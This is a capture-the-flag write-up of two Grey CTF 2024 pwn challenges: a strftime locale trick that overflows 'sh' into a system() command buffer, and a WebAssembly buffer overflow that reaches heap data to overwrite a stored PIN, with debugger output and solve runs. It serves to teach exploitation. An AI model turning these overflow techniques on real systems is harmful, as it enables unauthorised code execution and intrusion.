-->
Grey CTF Quals 2024 took place on 27 April. I played with slight_smile and got 3rd place locally, qualifying for the finals! I solved all the pwn except for heapheapheap, which is too painpainpain to do :((
Here are my writeups for some of the interesting pwn challenges.
Source code for the challenge:
In this challenge, we can provide arbitrary strftime
format strings and also change the locale used to generate the
string. The difference between printf
and strftime
is that strftime
only has 1 “argument” - the time. This makes
it much safer than printf
vulnerability. However, in here, we have 2 buffers - the output
and command
buffer,
where the output
buffer is placed before the command
buffer in memory. The command
buffer is passed to system
when
we select option 3.
The limit passed to strftime is 0x30, which means that the output will be at most 0x30 bytes long. memcpy
uses the
strlen
of the output to copy n
bytes to output
, which is only 0x20 bytes long. We just need to use specifiers that
output more than 2 bytes (since each specifier is 2 bytes) in order to increase the length of the specifier and overflow
into command
.
The goal is to find a datetime string from a certain locale with sh
in it, so we can overflow into the command
variable with sh
and get RCE. Obviously I’m not Duolingo and I don’t know every language, so I spun up the provided
container to get all the available locales on remote.
/ # ls /srv/usr/lib/locale
C.utf8 ca_ES@valencia es_BO gl_ES@euro mnw_MM sq_AL.utf8
aa_DJ ca_FR es_BO.utf8 gu_IN mr_IN sq_MK
...
(there are over 500 so I’m not putting all here)
Then taking these locales, I looped through a few different format specifiers to see if sh
appears in the output.
These few locales gave me sh
:
# %A: [*] sq_AL.utf8: b'e shtun\xc3\xab\xbe\xd1\x82\xd0\xb0\x97\xe1\x83\x98\n'
# %c: [*] xh_ZA.utf8: b'Mgq 20 Tsh 2024 08:00:06 UTC\n'
# %b: [*] xh_ZA.utf8: b'Tsh\n'
However, because we want the command to just be sh
, the only one we can use is %b
, as the newline will be replaced
by \x00
. It’s not enough for the datetime to contain sh
, it must end with sh
. We need to overflow the buffer such that the T is not in command buffer.
Another way to solve this is to find separate datetime strings that end with h
and s
, and overflow them
individually, such that the following occurs:
round 1 (output is xxxxxh): xxxxxh\x00
round 2 (output is xxxxs): xxxxsh\x00
The reason why this works is actually slightly more complicated. At first glance, the output from strftime
is always
truncated with a null byte, so it shouldn’t be possible to combine multiple strings to form our command. However,
because of uninitialized stack, this exploit is actually feasible. According to the strftime
docs:
If the total number of resulting bytes including the terminating null byte is not more than maxsize, strftime() shall return the number of bytes placed into the array pointed to by s, not including the terminating null byte. Otherwise, 0 shall be returned and the contents of the array are unspecified.
strftime
doesn’t terminate the output string with a null byte! The stack must align nicely such that print_time
is
always allocated the same stack frame. Since buf
isn’t initialized, the old output from strftime
will still be
there, and the strlen
will be new output + remaining old output
. This entire string will then be copied into
output
and subsequently overflow into command
with the “sh” string we want.
During the CTF, I just used the below exploit which only needs 1 round of input, but it only works in April. I’m too lazy to find an exploit that works in May for multiple-round inputs :)
Unfortunately, at the point of making this writeup, it is no longer April and my exploit doesn’t work anymore :(
(also the entire reason for moving grey is so that this chall would be solvable)
This challenge was part 2 of The Motorola.
The main challenge for both parts is in this snippet:
Some context for The Motorola Part 1:
We are supposed to guess the secret PIN which is stored in the heap (our buffer overflow is on the stack, so we can’t overwrite it). We have a scanf buffer overflow, and there’s a win function defined (view_message). We can just ret2win here, no need to leak or overwrite the pin.
The difference is that Motorola 1 was compiled to x86_64, while Motorola 2 is compiled to wasm. Surprisingly (or unsurprisingly), this changes a lot of things under the hood!
To run the binary in GDB, install wasmtime and run the following command:
Now, what’s different about this challenge?
Firstly, RCE is no longer possible. To understand why, we need to dive into how wasm control flow works.
Functions are natively typed in wasm. If you run wasm2wat
on the binary, you can see a lot of generic function types:
For example, slow_type
is compiled as a type 7
function, which takes in 1 i32
parameter and returns
nothing.
When a call is made from a parent function, the instruction is simply call $slow_type
. This is a little similar to
call
in Intel/AT&T syntax. The current instruction address is pushed onto the call stack, which is a separate stack
for instruction pointers to continue execution after call
and call_indirect
. This stack lives outside the runtime
VM, so it’s generally not possible to hijack it. The arguments to the function are pushed onto the top of the stack, and
these arguments become the locals
array which can be accessed within the function (eg. local.get 14
will get the
15th value on the stack). When the function is finished, the return value(s) are pushed onto the stack and the parent
function continues execution based on the call stack.
Here’s a demo, breaking on the slow_type
function:
Trace:
0 0x7ffff5bd70f0
1 0x7ffff5bd757b
2 0x7ffff5bd78c0
3 0x7ffff5bd70b1
4 0x7ffff5bed4ba
pwndbg> stack
+000 rsp 0x7fffffffbb28 —▸ 0x7ffff5bd757b ◂— mov dword ptr [r14 + 0x1d0], r15d
...
+048 0x7fffffffbb68 —▸ 0x7ffff5bd78c0 ◂— xor eax, eax
...
+068 0x7fffffffbb88 —▸ 0x7ffff5bd70b1 ◂— mov rbx, rax
The value pointed to by rsp
(rsp
of VM, not the sandboxed process!) belongs, if we check the disassembly, to the
login
function.
Dump of assembler code for function login:
0x00007ffff5bd7410 <+0>: push rbp
0x00007ffff5bd7411 <+1>: mov rbp,rsp
0x00007ffff5bd7414 <+4>: mov r10,QWORD PTR [rdi+0x8]
...
0x00007ffff5bd757b <+363>: mov DWORD PTR [r14+0x1d0],r15d
0x00007ffff5bd7582 <+370>: mov rbx,QWORD PTR [rsp]
0x00007ffff5bd7586 <+374>: mov r12,QWORD PTR [rsp+0x8]
0x00007ffff5bd758b <+379>: mov r13,QWORD PTR [rsp+0x10]
0x00007ffff5bd7590 <+384>: mov r14,QWORD PTR [rsp+0x18]
0x00007ffff5bd7595 <+389>: mov r15,QWORD PTR [rsp+0x20]
0x00007ffff5bd759a <+394>: add rsp,0x30
0x00007ffff5bd759e <+398>: mov rsp,rbp
0x00007ffff5bd75a1 <+401>: pop rbp
0x00007ffff5bd75a2 <+402>: ret
0x00007ffff5bd75a3 <+403>: ud2
(side note, all user-defined functions live in this address space):
0x7ffff5b96000 0x7ffff5bd6000 rw-p 40000 0 [anon_7ffff5b96]
0x7ffff5bd6000 0x7ffff5bd7000 r--p 1000 0 [anon_7ffff5bd6]
0x7ffff5bd7000 0x7ffff5bee000 r-xp 17000 0 [anon_7ffff5bd7] <-- function page
0x7ffff5bee000 0x7ffff5c54000 r--p 66000 0 [anon_7ffff5bee]
0x7ffff5c54000 0x7ffff5c55000 ---p 1000 0 [anon_7ffff5c54]
Probably, the space is writable at some point during VM initialization, and the wasm is compiled to x86_64 “JIT”, and written to this space.
Another thing - you might have noticed by now that wasm doesn’t really have a concept of registers. Rather (similar to python bytecode!), it stores most values on the stack (in fact, its entire memory is just a huge array, a continuous block of memory). And our “stack” (the entire linear memory region within the VM) is found in this memory region:
0x7ffdb0000000 0x7ffe30000000 ---p 80000000 0 [anon_7ffdb0000]
0x7ffe30000000 0x7ffe30002000 rw-p 2000 0 /memfd:wasm-memory-image (deleted)
0x7ffe30002000 0x7ffe30020000 rw-p 1e000 0 [anon_7ffe30002] <-- our linear memory region
0x7ffe30020000 0x7fffb0000000 ---p 17ffe0000 0 [anon_7ffe30020]
0x7fffb0000000 0x7fffb0089000 rw-p 89000 0 [anon_7fffb0000]
Anyway, the point of all this is to show that RIP control isn’t possible with regular call
, because the call stack is
isolated far far away from the VM’s accessible memory.
What about call_indirect
? It takes a function index from the stack, accesses the function table, and calls the
function with the corresponding index. The main purpose is to maintain compatibility with C native functions (eg.
fclose
which reads the close function for the target file from the FILE struct, which can only be known at runtime).
Since the arguments must be passed in through the stack, and can be known at compile time, wasm is smart about this and
requires the function signature in call_indirect
. For example:
will crash if the function index at the top of stack references a function that isn’t of type 0
. This greatly
restricts the functions we can jump to.
Unfortunately, we don’t have call_indirect
in the login
function. This is the disassembly for login
:
So, RCE is out of the question. How else can we exploit the buffer overflow? We can’t overwrite the pin, because it’s stored in the heap, far away from the stack…right?
Actually, since wasm was designed to be sandboxed, the linear memory region/array is kept as small as possible, without the usual gaps between pages like the stack and heap that we see in regular x86_64 binaries. This means that the stack and heap might actually be contiguous! Let’s check how the stack and heap are set up, by setting a known PIN and known attempt, and searching for the 2 values in memory:
(I set the pin to TESTPINTESTPINTESTPINTESTPINTESTPIN)
pwndbg> search -t bytes TESTPINTESTPINTESTPINTESTPINTESTPIN
[anon_7ffe30002] 0x7ffe300127e0 'TESTPINTESTPINTESTPINTESTPINTESTPIN\n'
pwndbg> search -t bytes asdf
[anon_7ffe30002] 0x7ffe300122d0 0x66647361 /* 'asdf' */
pwndbg> p/x 0x7ffe300127e0 - 0x7ffe300122d0
$1 = 0x510
As we realize, the saved pin value is 0x510 after our input buffer! The reason why the heap is placed after the stack is
because (I think) the stack is the first region to be defined, while the heap is only created after the first malloc
call. So, wasm simply defines regions sequentially in the memory space, hence putting it after the stack.
This way, the challenge becomes similar to a strcmp
challenge - just spam null bytes between input and saved pin, and
we should be good to go, right?
● ctf/comp/2024-H0/greyctf/the-motorala-2
$ : python3 solve.py
[+] Opening connection to challs.nusgreyhats.org on port 30212: Done
[*] Switching to interactive mode
After several intense attempts, you successfully breach the phone's defenses.
Unlocking its secrets, you uncover a massive revelation that holds the power to reshape everything.
The once-elusive truth is now in your hands, but little do you know, the plot deepens, and the journey through the
clandestine hideout takes an unexpected turn, becoming even more complicated.
\x1b[0m
[*] Got EOF while reading in interactive
We are in fact not good to go - it crashed without printing the flag :(
Let’s take a closer look at the region between input and PIN:
pwndbg> tel 0x7ffe300122d0
00:0000│ 0x7ffe300122d0 ◂— 0x66647361 /* 'asdf' */
01:0008│ 0x7ffe300122d8 ◂— 0
... ↓ 5 skipped
07:0038│ 0x7ffe30012308 ◂— 0x1100000000
08:0040│ 0x7ffe30012310 ◂— 0x18e0000018e0
09:0048│ 0x7ffe30012318 ◂— 0x3200000010
0a:0050│ 0x7ffe30012320 ◂— 0x300012350
0b:0058│ 0x7ffe30012328 ◂— 0
... ↓ 3 skipped
0f:0078│ 0x7ffe30012348 ◂— 0x1300000000
10:0080│ 0x7ffe30012350 ◂— 0
11:0088│ 0x7ffe30012358 ◂— 0x48100000000
12:0090│ 0x7ffe30012360 ◂— 0x1235800012358
13:0098│ 0x7ffe30012368 ◂— 0
14:00a0│ 0x7ffe30012370 ◂— 0x4000019e8
15:00a8│ 0x7ffe30012378 ◂— 0x300000000
16:00b0│ 0x7ffe30012380 ◂— 0x100000002
17:00b8│ 0x7ffe30012388 ◂— 0x400000123d8
18:00c0│ 0x7ffe30012390 ◂— 0
19:00c8│ 0x7ffe30012398 ◂— 0xffffffff00000004
1a:00d0│ 0x7ffe300123a0 ◂— 0xffffffff
1b:00d8│ 0x7ffe300123a8 ◂— 0
... ↓ 133 skipped
a1:0508│ 0x7ffe300127d8 ◂— 0x5200000480
a2:0510│ 0x7ffe300127e0 ◂— 'TESTPINTESTPINTESTPINTESTPINTESTPIN\n'
a3:0518│ 0x7ffe300127e8 ◂— 'ESTPINTESTPINTESTPINTESTPIN\n'
a4:0520│ 0x7ffe300127f0 ◂— 'STPINTESTPINTESTPIN\n'
a5:0528│ 0x7ffe300127f8 ◂— 'TPINTESTPIN\n'
a6:0530│ 0x7ffe30012800 ◂— 0xa4e4950 /* 'PIN\n' */
Most likely, we overwrote some important values here that should not be 0, hence crashing the program. These values are probably the heap metadata used to maintain the heap, which explains why the program crashed when we tried to read the flag file.
Luckily, wasm sandboxing once again works to our advantage. Since addresses are simply offsets from the start of the virtualized memory region, there’s no PIE or ASLR involved, so we can just hardcode all the values - whether addresses or chunk size values - without needing to leak anything! It took me a while to copy the values over into the exploit script, but this is the final exploit:
$ : python3 solve.py
[+] Opening connection to challs.nusgreyhats.org on port 30212: Done
[*] Switching to interactive mode
After several intense attempts, you successfully breach the phone's defenses.
Unlocking its secrets, you uncover a massive revelation that holds the power to reshape everything.
The once-elusive truth is now in your hands, but little do you know, the plot deepens, and the journey through the
clandestine hie
$out takes an unexpected turn, becoming even more complicated.
\x1b[0m
grey{s1mpl3_buff3r_0v3rfl0w_w4snt_1t?_r3m3mb3r_t0_r34d_th3_st0ryl1ne:)}
Very cool challenge that inspired me to learn more about wasm! :)